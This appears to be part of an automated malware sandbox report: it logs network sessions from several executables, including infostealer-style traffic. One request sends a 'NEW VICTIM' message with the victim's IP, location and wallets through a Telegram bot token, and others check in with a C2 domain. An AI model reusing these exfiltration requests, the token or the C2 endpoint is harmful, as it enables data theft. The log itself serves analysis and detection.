                                                                                                                                                                                                                                                              Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              21192.168.2.449904149.154.167.2204432212C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:17:00 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: TelegramBot
                                                                                                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-22 01:17:01 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:00 GMT
                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                              Content-Length: 777
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                              2024-12-22 01:17:01 UTC777INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 31 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22
                                                                                                                                                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":30111,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              22192.168.2.44990834.117.59.814434628C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:17:01 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: IPInfoFetcher
                                                                                                                                                                                                                                                              Host: ipinfo.io
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-22 01:17:01 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                              Content-Length: 321
                                                                                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                              date: Sun, 22 Dec 2024 01:17:01 GMT
                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                                                                                                              strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-22 01:17:01 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                                                                                                                                              Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              23192.168.2.44991198.85.100.804432648C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:17:03 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                                                                                                              Host: httpbin.org
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              2024-12-22 01:17:03 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:03 GMT
                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Server: gunicorn/19.9.0
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                              2024-12-22 01:17:03 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                                                                                                                              Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              24192.168.2.449916149.154.167.2204434628C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:17:03 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: TelegramBot
                                                                                                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-22 01:17:04 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:04 GMT
                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                              Content-Length: 777
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                              2024-12-22 01:17:04 UTC777INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 31 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22
                                                                                                                                                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":30112,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              25192.168.2.450060104.21.21.994437012C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:17:53 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:17:53 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-22 01:17:54 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:54 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=5lb06me2cjic16hr2kp511tirf; expires=Wed, 16 Apr 2025 19:04:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bPaKRYiwtttB5an5lBhZVnhFQk%2F4Vx0NEqQC9Pc1kYfmT%2BFpkK1UM8MZl%2F3k8bUacLbiiiMC%2BU%2F%2BxmFh7AIepuZxyLEBB2Gr%2Bw1rOMdzJ1fmpfMC8%2FYSRk0YAMYT1ZOxjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c465d6edf8c9b-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2003&rtt_var=755&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1457813&cwnd=171&unsent_bytes=0&cid=e47217cda250afe9&ts=1044&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:17:54 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-22 01:17:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              26192.168.2.450068104.21.21.994437012C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:17:56 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 47
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:17:56 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                              2024-12-22 01:17:59 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:59 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=o6q301dr0t74ktnua84ra5o5g5; expires=Wed, 16 Apr 2025 19:04:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMnwo2BpAn6kH1g45mPJdkPG2SuAkTuScudMFDIWmTO0WT8VIvS9CHWgp4y%2BggOzjITfjp5x6OOW0GTYfuhC5tBj0rc8utiRLm%2BvvxAsHUYL6dAF1VMVbyhDTuuFSM%2Bwgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c466d2b287c84-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2065&rtt_var=778&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=945&delivery_rate=1414043&cwnd=246&unsent_bytes=0&cid=2c3a772bb9fd3b60&ts=2803&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:17:59 UTC243INData Raw: 34 39 31 63 0d 0a 6b 32 44 39 77 64 2f 61 47 32 45 47 65 6c 35 77 42 71 61 52 71 46 34 47 73 37 56 77 53 34 59 67 59 66 39 51 4a 6f 4a 4d 59 53 4c 6f 51 6f 76 6a 35 65 34 33 51 33 55 66 66 45 70 79 31 4f 54 4e 63 69 54 53 30 56 4a 78 34 45 45 4e 6a 44 55 4b 6f 44 6f 4d 41 4b 6b 47 6e 4b 32 73 76 7a 64 44 59 77 4a 38 53 6c 33 64 73 38 30 77 4a 49 6d 58 46 53 48 6b 51 51 32 64 4d 55 33 74 50 41 31 42 2b 77 79 61 71 62 71 35 66 77 42 71 46 7a 73 56 59 38 66 37 78 6a 64 72 32 39 68 53 5a 36 52 46 47 39 31 71 42 4d 38 70 46 55 50 65 41 59 36 71 2f 61 63 33 47 69 51 66 4d 46 49 38 68 50 44 4e 50 47 72 56 30 52 73 6a 37 6b 67 46 6e 44 52 4d 38 69 55 48 53 76 73 43 6d 61 69 77 73 47 73 4e 59 42 41 77 45 32 6e 48 73 34 52 38 59
                                                                                                                                                                                                                                                              Data Ascii: 491ck2D9wd/aG2EGel5wBqaRqF4Gs7VwS4YgYf9QJoJMYSLoQovj5e43Q3UffEpy1OTNciTS0VJx4EENjDUKoDoMAKkGnK2svzdDYwJ8Sl3ds80wJImXFSHkQQ2dMU3tPA1B+wyaqbq5fwBqFzsVY8f7xjdr29hSZ6RFG91qBM8pFUPeAY6q/ac3GiQfMFI8hPDNPGrV0Rsj7kgFnDRM8iUHSvsCmaiwsGsNYBAwE2nHs4R8Y
                                                                                                                                                                                                                                                              2024-12-22 01:17:59 UTC1369INData Raw: 38 6d 58 53 6d 6d 33 63 41 43 4d 49 31 48 74 50 67 55 41 37 6b 79 47 34 37 71 30 4f 56 73 6b 45 44 41 63 59 63 66 38 7a 54 31 6b 77 39 67 53 4b 75 78 4b 42 35 63 39 53 2b 38 67 43 55 66 35 43 35 69 73 75 72 42 2f 44 47 64 59 63 6c 4a 6a 33 4c 4f 53 66 45 54 42 31 42 45 39 36 56 4e 44 67 6e 78 64 6f 43 6b 50 41 4b 6c 43 6d 61 32 38 74 58 6b 52 62 42 4d 33 46 33 62 50 2b 73 63 78 5a 4e 7a 64 48 53 72 6b 52 51 6d 58 50 55 37 6b 49 77 35 47 38 51 4c 66 37 66 32 2f 59 55 4d 38 57 42 38 58 64 4d 50 2f 33 48 35 65 6b 63 68 63 4d 4b 52 46 44 39 31 71 42 4f 67 72 41 45 50 36 44 5a 79 72 74 71 70 35 45 57 49 56 4f 51 42 69 77 66 33 41 50 33 62 62 32 52 51 71 37 55 6b 4b 6d 44 56 41 6f 47 42 44 52 2b 6c 43 78 2b 4f 63 74 58 49 50 62 67 38 38 55 6e 75 4b 36 6f 6f 37
                                                                                                                                                                                                                                                              Data Ascii: 8mXSmm3cACMI1HtPgUA7kyG47q0OVskEDAcYcf8zT1kw9gSKuxKB5c9S+8gCUf5C5isurB/DGdYclJj3LOSfETB1BE96VNDgnxdoCkPAKlCma28tXkRbBM3F3bP+scxZNzdHSrkRQmXPU7kIw5G8QLf7f2/YUM8WB8XdMP/3H5ekchcMKRFD91qBOgrAEP6DZyrtqp5EWIVOQBiwf3AP3bb2RQq7UkKmDVAoGBDR+lCx+OctXIPbg88UnuK6oo7
                                                                                                                                                                                                                                                              2024-12-22 01:17:59 UTC1369INData Raw: 51 6d 36 55 35 44 30 33 4a 44 2b 47 35 62 41 4e 73 42 69 36 43 33 2b 6b 77 41 61 68 59 37 42 43 54 62 76 64 4e 38 59 39 32 58 53 6d 6e 70 51 77 75 62 49 45 76 74 4c 51 31 4f 2f 67 65 51 71 37 32 34 64 41 5a 67 45 7a 63 52 61 63 44 68 77 44 78 73 31 4e 59 59 49 36 51 4d 51 35 6f 71 42 4c 68 75 4d 6c 66 36 51 4b 71 67 73 37 5a 2b 46 53 51 48 63 67 73 6b 77 2f 2b 4b 5a 43 54 63 33 78 63 73 36 30 4d 4a 6b 7a 64 4f 37 43 59 4e 51 2b 4d 4e 6d 36 4f 78 73 48 4d 4f 61 68 77 30 47 32 2f 50 39 63 6f 39 62 70 47 5a 55 69 37 38 41 6c 76 64 42 6b 50 73 49 77 77 43 78 41 47 52 72 62 71 75 4f 52 77 71 41 58 77 56 61 49 53 72 69 6a 42 74 30 64 77 59 4c 65 52 46 44 70 67 78 51 2b 4d 6a 42 45 72 2f 42 5a 75 76 74 4c 56 2f 41 32 4d 63 4f 51 42 68 7a 66 2f 47 66 43 71 52 30
                                                                                                                                                                                                                                                              Data Ascii: Qm6U5D03JD+G5bANsBi6C3+kwAahY7BCTbvdN8Y92XSmnpQwubIEvtLQ1O/geQq724dAZgEzcRacDhwDxs1NYYI6QMQ5oqBLhuMlf6QKqgs7Z+FSQHcgskw/+KZCTc3xcs60MJkzdO7CYNQ+MNm6OxsHMOahw0G2/P9co9bpGZUi78AlvdBkPsIwwCxAGRrbquORwqAXwVaISrijBt0dwYLeRFDpgxQ+MjBEr/BZuvtLV/A2McOQBhzf/GfCqR0
                                                                                                                                                                                                                                                              2024-12-22 01:17:59 UTC1369INData Raw: 62 51 35 6f 2b 42 4c 68 75 43 6b 6e 6a 44 4a 47 71 73 4c 35 78 42 47 6f 56 4e 78 52 76 77 2f 54 4d 4d 57 7a 63 30 68 45 6f 34 45 67 52 6e 6a 6c 4f 37 53 52 44 44 72 45 46 68 2b 50 6c 2b 46 34 50 54 51 67 6e 41 48 4b 45 37 49 51 6c 4a 4e 62 62 55 6e 47 6b 51 51 79 55 50 55 7a 6f 49 51 78 45 2f 77 53 5a 72 72 69 33 63 78 46 73 46 6a 45 5a 61 38 2f 68 79 6a 46 67 33 64 4d 61 49 75 34 43 54 64 30 31 58 4b 42 32 51 33 58 38 44 5a 2b 67 71 2f 68 6d 54 58 31 59 4f 78 34 6b 6e 4c 50 47 4d 6d 54 65 32 78 34 69 37 45 4d 50 6b 7a 56 42 36 53 59 4c 55 76 41 47 6c 36 4b 7a 74 33 67 48 59 52 30 34 46 57 44 43 2f 49 70 79 4a 4e 62 50 55 6e 47 6b 62 53 53 6f 63 47 58 61 62 68 77 4f 36 45 4b 59 72 2f 33 67 4f 51 39 6e 46 44 51 64 59 73 33 2f 77 44 56 76 33 64 77 57 4a 65
                                                                                                                                                                                                                                                              Data Ascii: bQ5o+BLhuCknjDJGqsL5xBGoVNxRvw/TMMWzc0hEo4EgRnjlO7SRDDrEFh+Pl+F4PTQgnAHKE7IQlJNbbUnGkQQyUPUzoIQxE/wSZrri3cxFsFjEZa8/hyjFg3dMaIu4CTd01XKB2Q3X8DZ+gq/hmTX1YOx4knLPGMmTe2x4i7EMPkzVB6SYLUvAGl6Kzt3gHYR04FWDC/IpyJNbPUnGkbSSocGXabhwO6EKYr/3gOQ9nFDQdYs3/wDVv3dwWJe
                                                                                                                                                                                                                                                              2024-12-22 01:17:59 UTC1369INData Raw: 4d 30 58 6d 50 41 52 4a 34 77 79 53 72 4c 57 77 63 41 4a 67 48 54 45 55 61 4d 37 79 7a 54 4a 71 32 5a 64 63 61 65 4e 61 51 38 56 79 5a 66 41 31 45 56 62 38 49 35 4b 73 2f 61 63 33 47 69 51 66 4d 46 49 38 68 50 72 59 4f 47 6e 44 33 68 55 6e 36 30 45 52 6e 44 39 50 38 69 6b 4d 52 50 59 4f 6d 61 79 37 75 58 77 4a 61 42 38 35 47 57 76 49 73 34 52 38 59 38 6d 58 53 6d 6e 4b 53 52 43 4b 4d 55 72 72 4f 42 67 41 37 6b 79 47 34 37 71 30 4f 56 73 6b 47 7a 63 5a 59 4d 54 2f 79 6a 68 70 30 63 55 64 4c 75 4e 4c 43 49 38 34 51 2b 63 6c 43 30 76 2b 42 49 32 76 73 36 70 38 45 58 5a 59 63 6c 4a 6a 33 4c 4f 53 66 46 4c 57 78 77 49 71 70 6e 4d 56 6e 69 52 50 37 53 4a 44 58 37 38 62 33 36 53 78 2b 43 46 44 59 68 63 31 45 57 76 46 2b 73 59 78 59 64 6a 53 45 79 2f 67 53 41 6d
                                                                                                                                                                                                                                                              Data Ascii: M0XmPARJ4wySrLWwcAJgHTEUaM7yzTJq2ZdcaeNaQ8VyZfA1EVb8I5Ks/ac3GiQfMFI8hPrYOGnD3hUn60ERnD9P8ikMRPYOmay7uXwJaB85GWvIs4R8Y8mXSmnKSRCKMUrrOBgA7kyG47q0OVskGzcZYMT/yjhp0cUdLuNLCI84Q+clC0v+BI2vs6p8EXZYclJj3LOSfFLWxwIqpnMVniRP7SJDX78b36Sx+CFDYhc1EWvF+sYxYdjSEy/gSAm
                                                                                                                                                                                                                                                              2024-12-22 01:17:59 UTC1369INData Raw: 44 46 4e 57 62 45 46 6b 2b 50 6c 2b 48 6f 45 5a 78 6b 32 47 32 6a 4c 39 4d 34 75 62 74 62 46 45 79 6a 76 54 77 2b 64 50 30 6e 71 4c 77 70 4e 2f 51 2b 59 70 4c 4b 39 4f 55 30 6b 48 79 52 53 50 49 54 53 78 7a 64 6f 69 6f 31 53 4e 71 70 62 51 35 6f 2b 42 4c 68 75 41 30 72 30 43 4a 4b 67 73 72 74 72 41 6d 49 4b 50 42 39 75 31 76 6e 42 4f 57 6e 63 32 68 45 76 34 6b 6b 50 6a 7a 74 45 34 79 56 44 44 72 45 46 68 2b 50 6c 2b 46 6f 55 63 68 49 37 48 6e 4c 50 38 73 6b 71 61 63 47 58 58 47 6e 31 52 52 4c 64 61 6c 4c 77 4f 51 52 66 76 78 76 66 70 4c 48 34 49 55 4e 69 45 54 6f 56 59 73 72 68 7a 7a 70 72 33 74 34 62 4c 65 78 42 41 35 6b 32 51 2b 55 74 44 30 76 32 41 5a 43 6e 74 4c 5a 77 44 43 52 57 66 42 56 38 68 4b 75 4b 48 58 2f 53 32 78 39 70 2b 77 77 61 33 54 56 49
                                                                                                                                                                                                                                                              Data Ascii: DFNWbEFk+Pl+HoEZxk2G2jL9M4ubtbFEyjvTw+dP0nqLwpN/Q+YpLK9OU0kHyRSPITSxzdoio1SNqpbQ5o+BLhuA0r0CJKgsrtrAmIKPB9u1vnBOWnc2hEv4kkPjztE4yVDDrEFh+Pl+FoUchI7HnLP8skqacGXXGn1RRLdalLwOQRfvxvfpLH4IUNiEToVYsrhzzpr3t4bLexBA5k2Q+UtD0v2AZCntLZwDCRWfBV8hKuKHX/S2x9p+wwa3TVI
                                                                                                                                                                                                                                                              2024-12-22 01:17:59 UTC1369INData Raw: 43 70 51 72 2b 6f 71 37 31 2b 46 53 59 74 50 78 78 71 77 2b 57 4b 49 31 75 66 6c 78 30 7a 70 42 6f 36 68 48 4a 44 37 47 35 62 41 4f 51 46 6e 36 53 6e 72 6e 34 50 64 52 4d 78 48 6b 62 4c 39 4e 77 2f 61 39 4c 47 47 32 58 76 54 30 50 54 63 6b 50 34 62 6c 73 41 33 67 57 4a 6f 4a 4b 37 61 41 6f 6b 56 6e 77 56 63 6f 53 72 69 67 49 6b 77 39 51 43 4b 75 74 54 50 64 31 71 58 64 35 75 43 46 62 32 45 70 79 31 74 72 56 31 45 6c 70 59 5a 45 59 32 6c 71 47 59 62 6e 75 52 79 43 31 6e 70 45 4e 44 78 51 74 64 6f 44 68 44 47 4b 4e 4d 33 37 48 39 34 44 6c 45 5a 77 6f 75 46 47 66 53 38 49 30 43 57 76 62 42 47 43 37 30 52 52 53 53 63 67 71 67 49 55 4d 59 79 45 4b 57 70 4b 61 70 62 77 35 30 48 33 77 74 4b 6f 54 72 69 6d 51 6b 35 4e 51 63 4a 2b 4e 55 45 74 41 56 55 75 6f 70 45
